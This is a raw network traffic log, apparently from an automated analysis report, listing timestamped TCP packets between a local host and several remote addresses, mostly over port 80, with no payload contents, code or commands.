                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.732994080 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.733010054 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.733019114 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.733027935 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.733087063 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.733787060 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.733803988 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.733819008 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.733820915 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.733827114 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.733849049 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.733861923 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.733975887 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.734018087 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.734628916 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.734646082 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.734698057 CET4434994723.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.734761000 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.734761000 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.734776020 CET49947443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.735147953 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.735196114 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.735301971 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.735352993 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.735616922 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.735632896 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.735649109 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.735658884 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.735666990 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.735688925 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.735688925 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.735708952 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.735754967 CET4434994520.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.736126900 CET49945443192.168.2.620.110.205.119
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.736392021 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.736408949 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.736426115 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.736439943 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.736450911 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.736465931 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.736494064 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.818434954 CET4434994613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.821342945 CET49946443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.821365118 CET4434994613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.822278976 CET49946443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.822289944 CET4434994613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.856020927 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.856039047 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.856057882 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.856072903 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.856077909 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.856090069 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.856101036 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.856117010 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.856132984 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.856146097 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.856147051 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.856174946 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.856194973 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.856246948 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.856329918 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.856348991 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.856383085 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.856390953 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.856399059 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.856416941 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.856432915 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.856446028 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.856465101 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.856642008 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.856657982 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.856673002 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.856698990 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.856733084 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.856750965 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.856766939 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.856781960 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.856789112 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.856807947 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.856842995 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.857049942 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.857091904 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.857136011 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.857175112 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.857191086 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.857206106 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.857230902 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.857235909 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.857247114 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.857249022 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.857264996 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.857271910 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.857280970 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.857280970 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.857302904 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.857314110 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.857611895 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.857628107 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.857655048 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.857657909 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.857670069 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.857683897 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.857686043 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.857712030 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.857717991 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.857729912 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.857737064 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.857748032 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.857760906 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.857764959 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.857778072 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.857780933 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.857800961 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.857808113 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.857816935 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.857822895 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.857835054 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.857836008 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.857862949 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.857894897 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.858505011 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.858520031 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.858536005 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.858551979 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.858561993 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.858577967 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.858592033 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.858597994 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.858608961 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.858612061 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.858633995 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.858639002 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.858650923 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.858658075 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.858669043 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.858671904 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.858688116 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.858690023 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.858705044 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.858706951 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.858721972 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.858725071 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.858747959 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.858757019 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.859540939 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.859555960 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.859581947 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.859596968 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.859602928 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.859616041 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.859632015 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.859638929 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.859648943 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.859652996 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.859666109 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.859682083 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.859682083 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.859698057 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.859711885 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.859714031 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.859730959 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.859746933 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.859747887 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.859755039 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.859790087 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.860368967 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.860384941 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.860400915 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.860413074 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.860424995 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.860443115 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.861077070 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.861092091 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.861108065 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.861124039 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.861133099 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.861140013 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.861156940 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.861156940 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.861175060 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.861182928 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.861202955 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.861263037 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.918060064 CET4434995313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.918840885 CET49953443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.918875933 CET4434995313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.919374943 CET49953443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.919380903 CET4434995313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.921684980 CET4434994613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.921716928 CET4434994613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.921767950 CET4434994613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.921823978 CET49946443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.921979904 CET49946443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.921998978 CET4434994613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.922010899 CET49946443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.922017097 CET4434994613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.924040079 CET4434995213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.927504063 CET49968443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.927529097 CET4434996813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.927669048 CET49968443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.927926064 CET49968443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.927938938 CET4434996813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.928497076 CET49952443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.928514957 CET4434995213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.929032087 CET49952443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.929037094 CET4434995213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.943593979 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.943684101 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.943737030 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.943753004 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.943768024 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.943782091 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.943790913 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.943805933 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.943821907 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.943824053 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.943825006 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.943836927 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.943871975 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.943871975 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.943907022 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.943922997 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.943937063 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.943977118 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.943977118 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.944093943 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.944108009 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.944122076 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.944129944 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.944144011 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.944181919 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.944181919 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985315084 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985333920 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985359907 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985377073 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985389948 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985400915 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985414982 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985431910 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985446930 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985459089 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985459089 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985464096 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985479116 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985493898 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985507011 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985510111 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985538006 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985538006 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985555887 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985574007 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985575914 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985596895 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985613108 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985613108 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985613108 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:40.985622883 CET8049910185.215.113.206192.168.2.6
